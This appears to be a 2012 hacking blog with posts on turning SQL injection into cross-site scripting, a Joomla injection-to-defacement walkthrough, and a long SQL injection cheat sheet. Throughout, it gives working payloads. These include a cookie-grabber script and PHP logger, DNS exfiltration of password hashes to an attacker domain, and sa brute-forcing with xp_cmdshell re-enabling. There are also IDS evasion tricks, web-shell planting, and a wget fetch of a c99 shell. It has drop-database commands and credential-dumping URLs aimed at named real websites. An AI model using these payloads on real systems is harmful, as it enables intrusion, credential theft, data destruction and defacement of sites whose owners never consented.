Sunday, 19 February 2012

XFS - XSS From SQL


XFS - XSS From SQL


[------------------------------------------------------------------------]

[+] Summary

[1] Presentation
[2] Explanation
[3] Demonstration



[------------------------------------------------------------------------]


[1] --[Presentation]--

XFS is a SQL deviation who lets return javascript code by through of the 
function char().
This function convert an ASCII code to char, this why we'll 
use it to execute javascript code.
The XFS can give you a restricted XSS 
possibility and obviously the SQL vulnerabilty.


So for XFS we need :

- String to ASCII converter
- The function char()

In the next parties you will see the conditions for do it, how it work 
and demonstration.


[2] --[Explanation]--

To use it, you need to convert your string in ASCII 
Char() will read the ASCII code and return it, so if you insert 
the ASCII javascript code, char() will return you the 
javascript code and it will be executed BUT when you encode your javascript 
code, this codemustn't have any space, so the XSS is restricted
but you can grab, alert and a lot of other XSS thing.

Example :

If you want convert your javascript code to ASCII, for work, the javascript 
code mustn't to be like it :

<script > alert(document.cookie) </script> <= You need to delete space :

<script>alert(document.cookie)</script> <= Its okay, you can convert it in ASCII


When the code will be convert in ASCII, you will get a thing like it :

46 65 42 12 85 68 ...

But before put it in char(ASCII), we need to replace space by "," like it :

46,65,42,12,85,68 ... <= Its okay for put in char()


[3] --[Demonstration]--

Vuln website :


Some javascript codes without space :

Alert :

################################
#
#- String : <SCRIPT>alert('xss')</script>
#
#- ASCII : 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 #41 60 
47 115 99 114 105 112 116 62 
#
################################

Cookie Grabber :

################################
#
#- String : 
<SCRIPT>location.href='http://www.yoursite.com/cookie.php?#cookie='
+escape(document.cookie)</SCRIPT>
#
#- ASCII : 60 83 67 82 73 80 84 62 108 111 99 97 116 105 111 
110 46 104 114 101 102 61 39 104 116 116 112 58 47 47 119 
119 119 46 121 111 117 114 115 105 116 101 46 99 111 109 
47 99 111 111 107 105 101 46 112 104 112 63 99 111 111 107
 105 101 61 39 43 101 115 99 97 112 101 40 100 111 99 117 
109 101 110 116 46 99 111 111 107 105 101 41 60 47 83 67 
82 73 80 84 62 
#
################################

Cookie Grabber file :

################################
#

# <?php
#
#
$cookies = $_GET["cookie"];
#
# if($cookies)

# {

#
# $grab = fopen("grab.txt","a");

# fputs($grab, $cookies . "\r\n");

# fclose($grab);

#
# }

#
# ?>
#
################################


So before insert your ASCII in char(), you must replace 
(in the ASCII code) all space by ",".

Example :

################################
# 45 52 86 23 54 ...
# To :
# 45,52,86,23,54 ...
################################

So lets go :

Alert :


You can see a textbox is executed with the text : "XSS" => it's the XSS alert

Saturday, 18 February 2012

Sqli Without Tools

Hi,

this is a tutorial based on other tutorial on HF but a little bit different, no sql tool used.

1/ Finding Exploit And Target

Google dork: inurl:"option=com_mytube"

Type that Dork in Google.



2/ Inject Target

Find a url like this:

Code:
http://site.com/index.php?option=com_mytube&Itemid=88..

Now replace the url like this:

Click here to view: http://pastebin.com/ZxxU8Nsr

If the site is vulnerable, you can see something like this:


We can see username, email and activation code. (username:email:activation code)

Now, let this page open and open a new page.

3/ Admin password reset

Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset

This is standard Joomla! query for password reset request



Type the email adress found in step 2 and press Submit.

The activation code should be resetted.

Return to the first page, refresh the page and take the new activation code.

Paste him in the token and press Submit.

problem with token.. :((

UPDATE: Joomla! 1.5.16 now hashes the reset token

if you see a thing like :$1$14411: after the activation code, it will not work

4/ Admin Login

If you done everything ok, your Password page will load. Enter your new password...
After that go to:
Code:
http://www.site.com/administrator/



Standard Joomla portal content management system

Enter the username (found in step 2) and your new password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

[color=#FF0000]Vuln. site compatible with this tutorial: 
Code:
http://www.mirditaturistike.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62




Advance SQLI

ADVANCED SQL

*********************************************************************************************************
type of injection

this is our Error-Based, and Union-Based SQL Injections
http://[site]/page.asp?id=1 or 1=convert(int,(USER))--
Syntax error converting the nvarchar value '[j0e]' to a column of data type int.


This is another way of getting the data out of the server (such as http, or dns).
http://[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.pwn3dbyj0e.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--




The latter case is known as "Blind SQL Injection".
http://[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--
Ask it if it's running as 'sa'

*********************************************************************************************************

Determine the Injection Type : integer or string

Integer Injection:
http://[site]/page.asp?id=1 having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
String Injection:
http://[site]/page.asp?id=x' having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.


Determining this is what determines if you need a ' or not.


*********************************************************************************************************
http://[site]/page.asp?id=1 or 1=convert(int,(USER))--
Syntax error converting the nvarchar value '[DB USER]' to a column of
data type int.
Grab the database user with USER
Grab the database name with DB_NAME
Grab the servername with @@servername
Grab the Windows/OS version with @@version
Error-Based SQL Injection Syntax for
extracting the USER



*********************************************************************************************************

http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
NO ERROR
http://[site]/page.asp?id=null UNION SELECT ALL 1,USER,3,4--
Union-Based SQL Injection Syntax for extracting the USER

*********************************************************************************************************

3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay
Blind SQL Injection Syntax for extracting the USER

*********************************************************************************************************


D  - 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'
Valid page returns immediately
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay
Blind SQL Injection Syntax for extracting the USER

B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds) )
Valid page returns after 10 second delay


O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>98) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
.....and so on
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay
Database User = DBO

 *********************************************************************************************************
http://[site]/page.php?id=null union all select 1,user(),3,4,5/*
http://[site]/page.php?id=null union all select 1,2,database(),4,5/*
http://[site]/page.php?id=null union all select 1,@@version,@@datadir,4,5/*
Grab the database user with user()
Grab the database name with database()
Grab the database version with @@version
Grab the database data directory with @@datadir
Information Gathering

*********************************************************************************************************

Error-Based SQL Injection
http://[site]/page.asp?id=2  or 1 in (select @@version)--
Obtaining the version of the OS
http://[site]/page.asp?id=2 or 1 in (select @@servername)--
Obtaining the hostname of the server
http://[site]/page.asp?id=2 or 1 in (select user)--
Obtaining the user
http://[site]/page.asp?id=2 or 1 in (select db_name(N))--
Obtaining the database name(s). N = start with 0 and keep incrementing
Basic SQLI Attack Methods





*********************************************************************************************************

Union-Based SQL Injection
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have an equal number
of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
NO ERROR
You should receive the error with each request, errors not shown to make room for the
slide
Basic SQLI Attack Methods



*********************************************************************************************************

True-False Blind SQL Injection
http://www.site.com/page.php?id=66 AND 1=1-- Valid Page
http://www.site.com/page.php?id=66 AND 1=2-- Error Page
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 51 3
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 53 5
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 52 4
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 43 +
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 45 -
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 46 .
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 51 3
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 49 1
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 48 0
MID() Extract characters from a text field
retrieved version: 5.0.45
Basic SQLI Attack Methods


*********************************************************************************************************


Time-Based Blind SQL Injection
http://[site]/page.asp?id=1;waitfor+delay+'0:0:5';--
See if it takes 5 seconds to return the page. If it does, then you can ask it questions.
http://[site]/page.asp?id=1;if+not(substring((select+@@version),%,1)+<>+5)+waitfor
+delay+'0:0:5';--
Ask it if he is running SQL Server 2000
http://[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--
Ask it if it's running as 'sa'
http://[site]/page.asp?id=1;if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--
Ask it if the current user a member of the sysadmin group
Basic SQLI Attack Methods



*********************************************************************************************************

http://www.http://www.liljon.com/liljon.asp?lil='
Gives the error:
Microsoft OLE DB Provider for SQL Server error '80040e14'
http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(USER))--
Gives the error:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near ')'.
Hmm....ok, so it doesn't like that right paren so let's add one more to the end of our query.
http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(USER)))--
Gives the error:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'liljon' to data type int.
Now we know every injection from here on out will require the additional right paren....
@@servername()), @@version()), db_name()), etc....
UGGGGHHH.....WTF???  (1)


http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(DB_NAME())))-
Gives the error:
Conversion failed when converting the nvarchar value 'yeaaaaaah' to data type int.
http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(@@VERSION)))-
Gives the error:
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23
2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790:
Service Pack 2) ' to data type int.
UGGGGHHH.....WTF???  (1) Cont.
*********************************************************************************************************

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201--
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2--
Received error: The text, ntext, or image data type cannot be selected as DISTINCT.
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO')--
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4--
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5--
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6--
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7--
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7,8--
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7,8,9--
Received error: Operand type clash: text is incompatible with int
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7,8,null--
Tips:
1. Always use UNION with ALL because of image similiar non-distinct field types. By default union tries to get records
with distinct.
2. Use NULL in UNION injections for most data type instead of trying to guess string, date, integer
UGGGGHHH.....WTF???  (2)

*********************************************************************************************************

Step 1: Brute-Force the 'sa' password
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'JOE','waitfor
delay ''0:0:50'';select 1;');&a=1
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'joe','waitfor
delay ''0:0:50'';select 1;');&a=1
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','waitfor
delay ''0:0:50'';select 1;');&a=1
Key point to remember is that we used time-based blind sqli to enumerate the sa account
password length. This is a great aid in bruteforcing.
Privilege Escalation



Step 2: Add current user to admin group
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','exec
master..sp_addsrvrolemember ''sa'',''sysadmin'';select 1');&a=1
Key point to remember is that we used time-based blind sqli to enumerate the sa account
password length. This is a great aid in bruteforcing.
*********************************************************************************************************


Step 3: Recreate the xp_cmdshell stored procedure
MSSQL Server 2000
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select
1;exec master..sp_dropextendedproc ''xp_cmdshell'';')&a=1
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select
1;DECLARE @result int,@OLEResult int,@RunResult int,@ShellID int EXECUTE
@OLEResult=sp_OACreate ''WScript.Shell'',@ShellID OUT IF @OLEResult<>0 SELECT
@result=@OLEResult IF @OLEResult<>0 RAISERROR(''CreateObject %0X'',
14,1,@OLEResult) EXECUTE @OLEResult=sp_OAMethod @ShellID,''Run'',Null,''ping -n 8
127.0.0.1'',0,1IF @OLEResult<>0 SELECT @result=@OLEResult IF @OLEResult<>0
RAISERROR (''Run %0X'',14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy
@ShellID');&a=1
Remember to correctly identify the backend version as this step because MS SQL 2000
handle this differently than MS SQL 2005
Privilege Escalation



*********************************************************************************************************

Step 3: Recreate the xp_cmdshell stored procedure (What's really going on?)
select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select 1;
DECLARE @result int,@OLEResult int,@RunResult int,@ShellID int
EXECUTE @OLEResult=sp_OACreate ''WScript.Shell'',@ShellID OUT IF @OLEResult<>0
SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR(''CreateObject%0X'',14,1,@OLEResult)
EXECUTE @OLEResult=sp_OAMethod @ShellID,''Run'',Null,''ping -n 8 127.0.0.1'',0,1IF @OLEResult<>0
SELECT @result=@OLEResult IF @OLEResult<>0
RAISERROR (''Run %0X'',14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy @ShellID');&a=1
Privilege Escalation

*********************************************************************************************************

Step 3: Recreate the xp_cmdshell stored procedure
MSSQL Server 2005 (re-enabling xp_cmdshell)
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select
1;exec master..sp_configure ''show advanced options'',1;reconfigure;exec
master..sp_configure ''xp_cmdshell'',1;reconfigure')&a=1
http://[site]/page.asp?id=1;exec master..sp_configure 'show advanced options',
1;reconfigure;exec master..sp_configure 'ole automation procedures',1;reconfigure;&a=1
Privilege Escalation

*********************************************************************************************************

Server-side Alphanumeric Filter
http://[site]/page.asp?id=2 or 1 like 1
Here we are doing an “or true,” although this time we are using the “like”
comparison instead of the “=” sign. We can use this same technique for the other
variants such as “and 1 like 1” or “and 1 like 2”
http://[site]/page.asp?id=2 and 1 like 1
http://[site]/page.asp?id=2 and 1 like 2
Restrictive Blacklist


Bypass Techniques:
http://[site]/page.asp?id=2 or 2=2--
http://[site]/page.asp?id=2 or 1<2--
http://[site]/page.asp?id=2 or 1 like 1--
http://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2--
....c'mon everyone name some more




*********************************************************************************************************

Signature 2
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection attempt”;
flow: to_server, established; pcre: “/(and|or) 1=1 (\-\-|\/\*|\#)/i”; sid: 1; rev:2;)
Bypass Techniques:
http://[site]/page.asp?id=2 or 2=2%2D%2D
http://[site]/page.asp?id=2 or 1<2%2D%2D
http://[site]/page.asp?id=2 or 1 like 1%2D%2D
http://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2%2D%2D
....c'mon everyone name some more
Signature Negatives
- 1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1<2, etc)
- Comments like pretty much anything else can be represented in other encoding type
(ex: (%2D%2D = --)
- It is possible to attack an sql injection vulnerability without using comments
If this signature is so easily bypassed, what is it actually good for?
Answer:
Again, it's great for automated tools and kiddies
Signature Based IDS (2)



*********************************************************************************************************

Signature 3-5
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT
statement”; flow: to_server, established; pcre:”/select.*from.*(\-\-|\/\*|\#)/i”; sid: 2; rev: 1;)
               
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection UNION
statement”; flow: to_server, established; pcre:”/union.*(\-\-|\/\*|\#)/i”; sid: 3; rev: 1;)
Bypass Techniques:
http://[site]/page.asp?id=2 or 2 in (%73%65%6C%65%63%74%20%75%73%65%72)%2D%2D
http://[site]/page.asp?id=2 or 2 in (select user)--
http://[site]/page.asp?id=-2 %55%4E%49%4F%4E%20%41%4C%4C%20%73%65%6C%65%63%74%201,2,3,(%73%65%6C
%65%63%74%20%75%73%65%72),5,6,7%2D%2D
http://[site]/page.asp?id=-2 UNION ALL select 1,2,3,(select user),5,6,7--
....c'mon everyone name some more
Signature Negatives
- Although sigs 3-5 are much better, they don't consider the attacker may use different encoding types such as hex
Signature Based IDS (3-5)




*********************************************************************************************************

Signature 6
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT statement”; flow: to_server,
established; pcre:”/(s|%73)(e|%65)(l|%6C)(e|%65)(c|%63)(t|%74).*(f|%66)(r|%72)(o|%6F)(m|%6D).*(\-\-|\/\*|\#)/i”; sid: 2; rev2
Signature 7
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT statement”; flow: to_server,
established; pcre:”/(s|%73|%53)(e|%65|%45)(l|%6C|%4C)(e|%65|%45)(c|%63|%43)(t|%74|%45).*(f|%66|%46)(r|%72|%52)(o|
%6F|%4F)(m|%6D|%4D).*(\-\-|\/\*|\#)/i”; sid: 2; rev: 3;)
At least signature 7 takes into account case sensitivity with hex encoding.
But.....
There are always other encoding types that the attacker can use...
Signature Based IDS (6-7)



*********************************************************************************************************
http://[site]/page.asp?id=2%20or%202%20in%20(/*IDS*/%73/*evasion*/%65/*is*/
%6C/*easy*/%65/*just*/%63/*ask*/%74/*j0e*/%20%75/*to*/%73/*teach*/%65/*you*/
%72/*how*/)%2D%2D
What is passed to the db
http://[site]/page.asp?id=2 or 2 in (select user)--
in comments ("IDS evasion is easy just ask j0e to teach you how")


*********************************************************************************************************
bypass filter words
/* !________ */
http://www.marmoon.com/games.php?id=437%20/*!ORDER%20BY*/%2013--

http://coffeagame.com/top.php?otsi=null' union select 1,unhex(hex(group_concat(m_kasutaja,0x3a,m_parool))),3,4,5,6,7,8,9,10,11,12,13,1 ?4,15 from coffea.user_table-- f

http://iri.iiu.edu.pk/index.php?page_id=7+and+1=2+union+select+1,2,0x417474656d7074696e6720746f204861636b,4,5,group_concat(0x3c62723e3c62723e,user_name,0x3c62723e3c62723e,user_email,0x3c62723e3c62723e,user_pass_str,0x3c62723e3c62723e,user_pass,0x3c62723e3c62723e,user_type,0x3c62723e3c62723e+separator+0x20),7,8,9,10,11+from+user


http://www.techniques.com.pk/index.php?cat_id=3+and+1=3+union+all+select+1,group_concat(0x4841434b454420425920544543484e4f,0x3c62723e3c62723e,login,0x3c62723e3c62723e,password),3,0x4841434b454420425920544543484e4f,5,6,7,8,0x56554c4e455241424c4520544f2053514c20494e4a454354494f4e532e2046495820495420475559532021213c62723e3c62723e203a50203c62723e425945202121,10,11,12,13+from+techniqu_techniq.tbladmin


http://www.maimonides.org/upper/newsDetail.php?id=170+and+1=3+union+all+select+1,group_concat(0x3c62723e3c62723e,username,0x3c62723e3c62723e,pwd,0x3c62723e3c62723e,email,0x3c62723e3c62723e+separator+0x3c62723e),3,4,5,6,7,8,9,10+from+users


http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=1000+and+1=3+union+all+select+1,2,3,4,5,password,name,8,9,10,11,12,13,14,15+from+admin

     http://site.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--


http://site.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--


http://www.commercial.southernrailway.go...8+and+1=0+ Union Select 1 ,2,concat(table_name,0x3a,column_name),4,5,6,7+from+information_schema.columns+where+table_schema=database()--

*********************************************************************************************************
bsqli

http://www.maimonides.org/upper/newsDetail.php?id=170/**/and/**/ascii(substring((select/**/concat(id,0x3a,username,0x3a,pwd,0x3a,email)/**/from/**/users/**/limit/**/[row],1),[+],1))=[char]--


*********************************************************************************************************
injecting shell

.php?id=-1+union+select+1,2,3,4,5,'<?php @system($_REQUEST["cmd"]); ?>',6,7,8+INTO+DUMPFILE+'/home/username/public_html/images/shell.php'

You will need to know document root eg. /home/username/public_html and to find any writeable directory on it to inject your shell. Than you navigate to your shell and type http://www.site.com/images/shell.php?cmd=ls

.php?id=-1 union select 1,2,'your shell code here',4,5,6,7,8 INTO DUMPFILE '/document/root/folder/shell.php'

Maybe you will need to HEX this 'your shell code here' and this '/document/root/folder/shell.php' or CHAR().
*********************************************************************************************************
php?cmd=wget http://www.localroot.net/c99ud.txt  -O c99.php so don't need to put all path cause the c99.php file will be created in the directory where you created your cmd shell.


*********************************************************************************************************
thedomain.com:2082
thedomain.com:2083
thedomain.com/admin
admin.thedomain.com
cpanel.thedomain.com



*********************************************************************************************************
In most cases there is no need to have all those symbols. + or /**/ or () for space is enough.


*********************************************************************************************************

Exploit:
If the value of $email is aaa@aaa.com' OR 1=1 INTO OUTFILE'/<directory-path>/pass.txt, the SQL request becomes:
select passmd5 from people where email=' aaa@aaa.com' OR 1=1 INTO OUTFILE'/<directory-path>/pass.txt'

Resulting in the passwords of the users being written into the file pass.txt.


*********************************************************************************************************
http://[site]/page.asp?id=1'a


http://foo/web.php?table=38 - We get normal screen
http://foo/web.php?table=38/*%20s*/ - We get normal screen
http://foo/web.php?table=38/*!%20s*/ - We get a different screen because syntax error in comments - MySQL is in use
http://foo/web.php?table=38/*!30000%20s*/ - We get a different screen, MySQL is at least 3.x.x
http://foo/web.php?table=38/*!40000%20s*/ - We get a different screen, MySQL is at least 4.x.x
http://foo/web.php?table=38/*!50000%20s*/ - We get normal screen, MySQL is below 5.x.x
http://foo/web.php?table=38/*!40020%20s*/ - We get normal screen, MySQL is below 4.0.20
http://foo/web.php?table=38/*!40017%20s*/ - We get a different screen, MySQL is at least 4.0.17
http://foo/web.php?table=38/*!40018%20s*/ - We get normal screen, MySQL is below 4.0.18


Starting scan for vuln in parameter id.

1) mysite.com/index.php?id=1+and+1=1 (true and true = true)

If u see page like with parameter id=1, maybe u have vuln parameter.

mysite.com/index.php?id=1+and+1=2 (true and false = false)
If u see empty page or error or redirect it says that u have vuln parameter

2) mysite.com/index.php?id=1'+and+'1'='1 (true and true = true)
mysite.com/index.php?id=1'+and+'1'='2 (true and false = false)

3) mysite.com/index.php?id=1"+and+"1"="1 (true and true = true)
mysite.com/index.php?id=1"+and+"1"="2 (true and false = false)

4) mysite.com/index.php?id=1+order+by+1+--+
mysite.com/index.php?id=1+order+by+1000+--+
If u see empty page or error or redirect it says that u have vuln parameter

5) mysite.com/index.php?id=1
mysite.com/index.php?id=2-1

6) mysite.com/index.php?id=1
mysite.com/index.php?id=1*1

7) mysite.com/index.php?id=
If u see empty page or error or redirect it says that u have vuln parameter

8) mysite.com/index.php?id=1'
If u see empty page or error or redirect it says that u have vuln parameter

9) mysite.com/index.php?id=1hello
"Unknown column '1hello' in 'where clause" vuln

10) site.com/index.php?id=1)/*

11) site.com/index.php?id=1')--+

12) site.com/index.php?id=1"/*

13)site.com/index.php?id=1))--+


Vuln parameters are not only parameters like "index.php?id=1:

Code: [Select]
mysite.com/index.php/id/6/
mysite.com/index.HTM?id=1

*********************************************************************************************************
.asp?xxx=2 union select name from sysobjects where xtype='u'

.asp?xxx=Select name from syscolumns where id=(select id from sysobjects where
name=‘table’)


=2‘ union
select card_number from%20 bank_cards where '1'='1’

=2; shutdown

=2; drop database xxx

*********************************************************************************************************



*********************************************************************************************************



*********************************************************************************************************



*********************************************************************************************************




*********************************************************************************************************



*********************************************************************************************************



*********************************************************************************************************

Related Posts Plugin for WordPress, Blogger...